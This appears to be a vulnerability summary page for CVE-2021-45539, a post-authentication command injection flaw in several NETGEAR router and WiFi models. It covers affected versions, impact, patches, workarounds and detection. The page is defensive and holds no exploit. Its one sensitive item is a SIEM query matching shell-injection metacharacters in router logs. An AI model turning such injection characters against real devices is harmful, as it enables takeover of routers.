CVE-2021-45539

8.4 HIGH

Remote Code Execution

📋 TL;DR

This vulnerability allows authenticated attackers to execute arbitrary commands on affected NETGEAR routers and WiFi systems. It affects multiple NETGEAR device models running vulnerable firmware versions. Attackers must have valid credentials to exploit this command injection flaw.

💻 Affected Systems

Products:

• NETGEAR R7900P
• NETGEAR R7960P
• NETGEAR R8000
• NETGEAR R8000P
• NETGEAR MR60
• NETGEAR RAX20
• NETGEAR RAX45
• NETGEAR RAX80
• NETGEAR MS60
• NETGEAR RAX15
• NETGEAR RAX50
• NETGEAR RAX75

Versions: R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.74, R8000P before 1.4.2.84, MR60 before 1.0.6.110, RAX20 before 1.0.2.82, RAX45 before 1.0.2.28, RAX80 before 1.0.3.106, MS60 before 1.0.6.110, RAX15 before 1.0.2.82, RAX50 before 1.0.2.28, RAX75 before 1.0.3.106

Operating Systems: Embedded router firmware

Default Config Vulnerable: ⚠️ Yes

Notes: All affected devices with default configurations are vulnerable. Exploitation requires valid administrative credentials.

📦 What is this software?

Mr60 Firmware by Netgear

View all CVEs affecting Mr60 Firmware →

Ms60 Firmware by Netgear

View all CVEs affecting Ms60 Firmware →

R7900p Firmware by Netgear

View all CVEs affecting R7900p Firmware →

R7960p Firmware by Netgear

View all CVEs affecting R7960p Firmware →

R8000 Firmware by Netgear

View all CVEs affecting R8000 Firmware →

R8000p Firmware by Netgear

View all CVEs affecting R8000p Firmware →

Rax15 Firmware by Netgear

View all CVEs affecting Rax15 Firmware →

Rax20 Firmware by Netgear

View all CVEs affecting Rax20 Firmware →

Rax45 Firmware by Netgear

View all CVEs affecting Rax45 Firmware →

Rax50 Firmware by Netgear

View all CVEs affecting Rax50 Firmware →

Rax75 Firmware by Netgear

View all CVEs affecting Rax75 Firmware →

Rax80 Firmware by Netgear

View all CVEs affecting Rax80 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install persistent backdoors, intercept network traffic, pivot to internal networks, or use the device for botnet activities.

🟠

Likely Case

Local network compromise, credential theft, DNS hijacking, or device configuration manipulation by authenticated malicious users.

🟢

If Mitigated

Limited impact if strong authentication controls are in place and network segmentation isolates the router management interface.

🌐 Internet-Facing: MEDIUM - While exploitation requires authentication, many routers have web interfaces exposed to the internet by default.

🏢 Internal Only: HIGH - Authenticated attackers on the local network can easily exploit this to gain full control of the router.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access but is straightforward once credentials are obtained. Public exploit code exists for similar NETGEAR vulnerabilities.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: R7900P/R7960P/R8000P: 1.4.2.84+, R8000: 1.0.4.74+, MR60/MS60: 1.0.6.110+, RAX20/RAX15: 1.0.2.82+, RAX45/RAX50: 1.0.2.28+, RAX80/RAX75: 1.0.3.106+

Vendor Advisory: https://kb.netgear.com/000064476/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-WiFi-Systems-PSV-2020-0195

Restart Required: Yes

Instructions:

1. Log into router web interface. 2. Navigate to Advanced > Administration > Firmware Update. 3. Check for updates. 4. If update available, download and install. 5. Router will reboot automatically.

🔧 Temporary Workarounds

Disable remote management

all

Prevent external access to router administration interface

Copy

Log into router > Advanced > Administration > Remote Management > Disable

Change default credentials

all

Use strong, unique passwords for router administration

Copy

Log into router > Advanced > Administration > Set Password > Create strong password

🧯 If You Can't Patch

• Isolate router management interface to trusted VLAN only
• Implement network segmentation to limit router access to authorized administrators

🔍 How to Verify

Check if Vulnerable:

Copy

Check router firmware version in web interface: Advanced > Administration > Firmware Update

Check Version:

Copy

Router-specific: Check via web interface or SSH if enabled

Verify Fix Applied:

Copy

Verify firmware version matches or exceeds patched versions listed in vendor advisory

📡 Detection & Monitoring

Log Indicators:

• Unusual command execution in router logs
• Multiple failed login attempts followed by successful login
• Unexpected configuration changes

Network Indicators:

• Unusual outbound connections from router
• DNS changes not initiated by administrator
• Unexpected port openings on router

SIEM Query:

Copy

source="router_logs" AND (command="*;*" OR command="*|*" OR command="*`*" OR command="*$(*")

📊 Metadata

CVE ID: CVE-2021-45539

CVSS v3 Score: 8.4 (HIGH)

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CWE: CWE-77

Published: December 26, 2021

Last Updated: November 21, 2024

🔗 References

• https://kb.netgear.com/000064476/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-WiFi-Systems-PSV-2020-0195 Patch,Vendor Advisory
• https://kb.netgear.com/000064476/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-WiFi-Systems-PSV-2020-0195 Patch,Vendor Advisory

📤 Share & Export

Twitter LinkedIn Reddit Copy Link

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-45539, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)

CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)

CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)